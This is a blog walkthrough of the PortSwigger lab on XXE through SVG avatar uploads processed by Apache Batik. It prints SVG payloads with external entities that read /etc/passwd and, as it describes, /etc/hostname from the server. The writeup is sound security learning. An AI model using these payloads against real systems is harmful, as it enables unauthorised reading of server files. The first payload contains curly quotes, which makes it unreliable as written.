PortSwigger Lab: Exploiting XXE via image file upload | WalkThrough

Introduction

Hello everyone in this post I am going to share the writeup of PortSwigger Lab( Exploiting XXE via image file upload) . The comment section is using upload avatar function which is using a older version of Apache Batik library that is vulnerable to XXE injection. We will use this vulnerability to read the contents of /etc/hostname file and solve the lab .

Target

This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.

To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the "Submit solution" button to submit the value of the server hostname.

Detection

In every post there is a comment section , here we can upload our avatars . Since we already know that server is using Apache Batik Library.

After searching the vulnerabilities for Apache Batik Library I came through this article.

In this vulnerability the web application offers its clients to upload a scalable vector graphics document SVG file and receive the contents of the file as a rasterized JPG or PNG file. Due to the fact that SVG files use XML for its representation the parsing routine is potentially prone to XXE injection attacks.

so make a file test.svg and paste the payload given below

 <?xml version=”1.0" standalone=”yes”?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM “file:///etc/passwd” > ]><svg width=”500px” height=”40px” xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink" version=”1.1">&xxe;</svg>

After sending the payload , right click on your profile and click on view image . The image is empty , which shows that the website is vulnerable to this exploit.

Exploitation

Now replace the content of test.svg with this

<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [  <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg  width="500px" height="100px" xmlns="http://www.w3.org/2000/svg"  xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text  font-family="Verdana" font-size="16" x="10"  y="40">&xxe;</text></svg>

we can see something is written but it is too small to be visible.

After changing the width and height of the payload (500px :500px ) , lets try testing it again.

/etc/passwd is now clear and visible.

Now lets see the content of /etc/hostname .

Submit the host name to complete the lab .

--

--

--

eJPT | eCPPT | DarkArmy CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Git Commands That You Must Know

Learning Go: Functions

Visualizing, Designing, and Analyzing the Heap Sort Algorithm.

Google Summer of Code 2021: Sympy (Week-2)

Notes to myself on Django Signals

Scanned PDFs quality enhancement using PyMuPDF & OpenCV

Cara Mengakses Keypad CVAVR

AWS/Terraform Workshop #2: EC2 Networking, Autoscaling Groups, CloudWatch

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
WraithOP

WraithOP

eJPT | eCPPT | DarkArmy CTF Player

More from Medium

AlbusSec:- Penetration-List 05 Cross-Site-Scripting (XSS) — Part 1

Privilege Escalation Leads to User File Storage leakage on PythonAnywhere.com Web Console

Throwback — Part 2 — Mail Server

Broken Access Control Overview